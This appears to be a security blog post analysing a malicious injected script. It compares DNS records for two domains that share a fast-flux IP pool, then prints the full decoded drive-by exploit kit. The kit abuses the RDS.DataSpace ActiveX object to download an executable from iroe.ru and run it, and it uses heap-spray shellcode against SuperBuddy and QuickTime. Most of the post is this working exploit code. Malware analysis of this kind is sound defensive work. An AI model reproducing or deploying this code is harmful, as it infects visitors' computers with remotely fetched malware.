analysis of www.h23f.ru/ngg.js

his injected domain calls iframe src from http://iroe.ru/cgi-bin/index.cgi?ad

domain comparison of iroe.ru and cashtransfers.tk

;; ANSWER SECTION:
http://www.h23f.ru.        600    IN    A    205.243.117.95
http://www.h23f.ru.        600    IN    A    76.22.173.185
http://www.h23f.ru.        600    IN    A    190.16.220.86
http://www.h23f.ru.        600    IN    A    79.85.67.175
http://www.h23f.ru.        600    IN    A    199.1.137.126
http://www.h23f.ru.        600    IN    A    60.48.105.62
http://www.h23f.ru.        600    IN    A    189.31.190.46
http://www.h23f.ru.        600    IN    A    70.45.157.146
http://www.h23f.ru.        600    IN    A    76.16.6.14
http://www.h23f.ru.        600    IN    A    98.148.158.27
http://www.h23f.ru.        600    IN    A    64.30.123.37
http://www.h23f.ru.        600    IN    A    67.61.72.248
http://www.h23f.ru.        600    IN    A    66.97.50.37
http://www.h23f.ru.        600    IN    A    74.64.32.141
http://www.h23f.ru.        600    IN    A    88.187.57.51

;; ANSWER SECTION:
cashtransfers.tk.    600    IN    A    70.45.157.146
cashtransfers.tk.    600    IN    A    189.31.190.46
cashtransfers.tk.    600    IN    A    76.22.173.185
cashtransfers.tk.    600    IN    A    64.30.123.37
cashtransfers.tk.    600    IN    A    74.64.32.141
cashtransfers.tk.    600    IN    A    67.61.72.248
cashtransfers.tk.    600    IN    A    98.148.158.27
cashtransfers.tk.    600    IN    A    76.16.6.14
cashtransfers.tk.    600    IN    A    60.48.105.62
cashtransfers.tk.    600    IN    A    199.1.137.126
cashtransfers.tk.    600    IN    A    66.97.50.37
cashtransfers.tk.    600    IN    A    190.16.220.86
cashtransfers.tk.    600    IN    A    79.85.67.175
cashtransfers.tk.    600    IN    A    88.187.57.51
cashtransfers.tk.    600    IN    A    205.243.117.95

yep…the same IPs

here is the decoded JS for http://iroe.ru/cgi-bin/index.cgi?ad


function aGLG9whi(Xny3hPRJ)
{
var lqrVjQMZ = "abcdefghiklmnopqrstuvwxyz0123456789";
var NkVd4HFo = '';
for (var MYEqDraQ=0; MYEqDraQ<Xny3hPRJ; MYEqDraQ++) {
var aDYieLWF = Math.floor(Math.random() * lqrVjQMZ.length);
NkVd4HFo += lqrVjQMZ.substring(aDYieLWF, aDYieLWF+1);
}

return NkVd4HFo;
}

function YP2JTGGZ(Rs7l7a7H, vIFmGBJa)
{
var RzTtV3MF = null;
var dqLGxA6t = 'RzTtV3MF=Rs7l7a7H.';
var WvtqthUf = new Array(
'CreateObject(vIFmGBJa)',
'CreateObject(vIFmGBJa, "")',
'CreateObject(vIFmGBJa, "", "")',
'GetObject("", vIFmGBJa)',
'GetObject(vIFmGBJa, "")',
'GetObject(vIFmGBJa)'
);

var NyBzEnWI=0;

while(!RzTtV3MF && NyBzEnWI < WvtqthUf.length) {
try {
eval(dqLGxA6t+WvtqthUf[NyBzEnWI]);
} catch(e) { }

NyBzEnWI++;
}

return RzTtV3MF;
}

function e2fBe_Sv(P_hlzvtY, asEuZKlS)
{

try {
P_hlzvtY.open("GET", asEuZKlS, false);
P_hlzvtY.send(null);

} catch(e) { return 0; }

return P_hlzvtY.responseBody;
}

function sZQzVcSj(OfUNuQDc, UbPIFLFD, MhBs75Rh)
{

try {
OfUNuQDc.Type = 1;
OfUNuQDc.Mode = 3;
OfUNuQDc.Open();
OfUNuQDc.Write(MhBs75Rh);
OfUNuQDc.SaveToFile(UbPIFLFD, 2);
OfUNuQDc.Close();
} catch(e) { return 0; }

return 1;
}

function Z_BXdDKb(TFuCJ1qH, P_hlzvtY, OfUNuQDc, VMYEzzGn, YQo73fEW)
{
var fgj7JSJJ = 0;
var uOfcyPZO = e2fBe_Sv(P_hlzvtY, TFuCJ1qH);

if (uOfcyPZO != 0) {
var R3w3ppXY = "c:\\"+aGLG9whi(6)+".exe";

if (sZQzVcSj(OfUNuQDc, R3w3ppXY, uOfcyPZO) == 1) {
if (YQo73fEW == 0) {
try {
VMYEzzGn.Run(R3w3ppXY, 0);
fgj7JSJJ = 1;
} catch(e) { }
} else {
try {
VMYEzzGn.ShellExecute(R3w3ppXY, "", "", "open", 0);
fgj7JSJJ = 1;
} catch(e) { }
}
}
}

return fgj7JSJJ;
}

function gkczTQqG()
{
var kYI_Pf9u = 0;
var JsKG4eip = 2;
var UoiwEYdP = "http://iroe.ru/cgi-bin/index.cgi?ff0ff0530100f0600277e0ed58060000000002b786a9670002080400000000020";
var phDJOHDS = new Array(null, null, null);

try {
var e0bEKCQI = 0;
var aLcWwrqq = document.createElement("object");
aLcWwrqq.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (aLcWwrqq) {
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "msxml2.XMLHTTP");
if (!phDJOHDS[0])
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "Microsoft.XMLHTTP");

if (!phDJOHDS[0])
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "MSXML2.ServerXMLHTTP");

phDJOHDS[1] = YP2JTGGZ(aLcWwrqq, "ADODB.Stream");

phDJOHDS[2] = YP2JTGGZ(aLcWwrqq, "WScript.Shell");

if (!phDJOHDS[2]) {
phDJOHDS[2] = YP2JTGGZ(aLcWwrqq, "Shell.Application");
if (phDJOHDS[2]) e0bEKCQI = 1;
}
}

if (phDJOHDS[0] && phDJOHDS[1] && phDJOHDS[2]) {
for(var XAuKF1LM=0;XAuKF1LM<JsKG4eip;XAuKF1LM++) {
var bKiNFTAV = Z_BXdDKb(UoiwEYdP+XAuKF1LM.toString(), phDJOHDS[0], phDJOHDS[1], phDJOHDS[2], e0bEKCQI);

if (!kYI_Pf9u)
kYI_Pf9u = bKiNFTAV;
}
}

} catch(e) {}

return kYI_Pf9u;
}

function sYExjgeL(XDLhUucH, burkvnnv)
{
try {

var DuqU1csl = new Date();
DuqU1csl.setDate(DuqU1csl.getDate() + 120000);

if (XDLhUucH) {
document.cookie =
"id=" + XDLhUucH +
"; path=/" +
"; expires=" + DuqU1csl.toGMTString();
}

if (burkvnnv) {
document.cookie =
"addt=" + burkvnnv +
"; path=/" +
"; expires=" + DuqU1csl.toGMTString();
}

} catch(e) {
}
}

var BeAETiyl = new Array();
var SYE4eNdo = 0;

function gLaEWFff()
{
BeAETiyl = BeAETiyl;
setTimeout(gLaEWFff, 100);
}

function mGMmPj3P(hX2fbMfA, C6AEzFsm)
{
while (hX2fbMfA.length*2<C6AEzFsm)
hX2fbMfA += hX2fbMfA;

hX2fbMfA = hX2fbMfA.substring(0,C6AEzFsm/2);
return hX2fbMfA;
}

function uCCyZWgp()
{
if (!SYE4eNdo) {
var NiQH7U5I = 0x0c0c0c0c;
var qUHpo_ky = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018e%u0000%u97b0%u4530%u4500%u7549%uebf9%u0700%u0707%u0707%u0707%u7e07%u976b%u9797%uf3c8%ua736%u9797%uef97%u1c9b%u9bd7%ue71c%u3a8b%uff1c%u7c9f%u1c9e%ua3d7%ud71a%u1ceb%uabff%u601c%u93fd%u7fce%u9718%u9797%u6e75%uf8ff%u97f9%uff97%ue5e2%ufafb%u68c3%u1c81%u7f7f%u97ee%u9797%u401c%u17d0%u97a8%u6de2%uc0d0%u17d0%u97a8%u6de2%u781c%ua4c8%u165e%u937b%u9796%u1c97%uc64b%uc4c5%u93ff%u9796%u6897%u9bc1%ucecd%uc5c6%u951c%ud4c4%uac17%ue297%u166d%u6bec%uf2b9%uf2ef%u94e2%u7c14%u1e9f%u5094%u93d4%uf2b9%uf2ef%ud451%u979f%u1dcc%u9356%u1fa7%u97d2%u57a4%uc7c7%uc0c4%u68c7%u87c1%u6f14%ue297%ufd91%uc496%uc168%ucd93%u14ce%u9355%u17d6%u97ad%u23e2%uc168%uc69f%u1cc1%uabe2%ue31c%uefb9%u6294%u1cc1%ub7e1%u6294%u5ea4%ud6de%u943a%ua452%u984c%u8729%u41ad%u9fe3%u5c56%u949a%ud74d%u667c%u88ac%u70e2%u1cc9%ub3c9%u4a94%u1cf1%udc9b%uc91c%u948b%u1c4a%u1c93%u5294%uc93c%u54ce%u687f%u6869%u1968%u99d9%u0f7b%u1d69%ue999%u754f%ua4e4%u1d5d%ua1cc%ub88d%ufde7%udaf2%uc0f2%uc5f3%u97e4%ue3ff%ue7e3%ub8ad%ufeb8%uf8e5%ub9f2%ue2e5%uf4b8%ufef0%uf5ba%uf9fe%ufeb8%uf3f9%ueff2%uf4b9%ufef0%uf1a8%ua7f1%uf1f1%ua2a7%ua7a4%ua7a6%uf1a7%ua1a7%ua7a7%ua0a5%uf2a0%uf2a7%ua2f3%ua7af%ua7a1%ua7a7%ua7a7%ua7a7%ua7a7%uf5a5%uafa0%uf6a1%ua1ae%ua7a0%ua7a7%ua7a5%ua7af%ua7a3%ua7a7%ua7a7%ua7a7%ua7a7%ua7af%u0097");
var teKRkTip = 0x400000;
var f0xyzFZU = qUHpo_ky.length * 2;
var C6AEzFsm = teKRkTip - (f0xyzFZU+0x38);
var hX2fbMfA = unescape("%u0c0c%u0c0c");

hX2fbMfA = mGMmPj3P(hX2fbMfA,C6AEzFsm);
var mNxJ2bIw = (NiQH7U5I - 0x400000)/teKRkTip;

for (var E1gS4q9w=0;E1gS4q9w<mNxJ2bIw;E1gS4q9w++) {
BeAETiyl[E1gS4q9w] = hX2fbMfA + qUHpo_ky;
}

SYE4eNdo = 1;
gLaEWFff();
}

return 0;
}

function ly3zcjzm() {

try {
var AwhjrUHt = new ActiveXObject('Sb.SuperBuddy');

if (AwhjrUHt) {
uCCyZWgp();
sYExjgeL(9);
AwhjrUHt.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function CwuYh_uX()
{
try {
var IHSFEQdb = new ActiveXObject("QuickTime.QuickTime.4");

if (IHSFEQdb) {
uCCyZWgp();
var sQnPnlXi = "";
for(var RsmxizaD=0;RsmxizaD<200;RsmxizaD++) {
sQnPnlXi += "AAAA";
}

sQnPnlXi += "AAA";

for(var RsmxizaD=0;RsmxizaD<3;RsmxizaD++) {
sQnPnlXi += "\x0c\x0c\x0c\x0c";
}

var SauSTYcf =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://iroe.ru/cgi-bin/index.cgi?ff0ff0530100f0600177e0ed58060000000002b786a967000208040000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + sQnPnlXi +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

h74xHwKE = 0;
var yNvHA7JL = document.createElement("div");
yNvHA7JL.innerHTML = SauSTYcf;
sYExjgeL(6);
document.body.appendChild(yNvHA7JL);

}
} catch(e) {
}

return 0;
}
if (gkczTQqG() || ly3zcjzm() || CwuYh_uX()
) {
document.xQ1dprWk = 'about:blank';
} else {
document.xQ1dprWk = 'about:blank';
}

/*setTimeout(function() {
if (document.h74xHwKE && document.ap8vC3pc && document.KUMTMmzi) {
setTimeout("window.location = '" + document.xQ1dprWk + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

here is the VT analysis of one of the malware.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: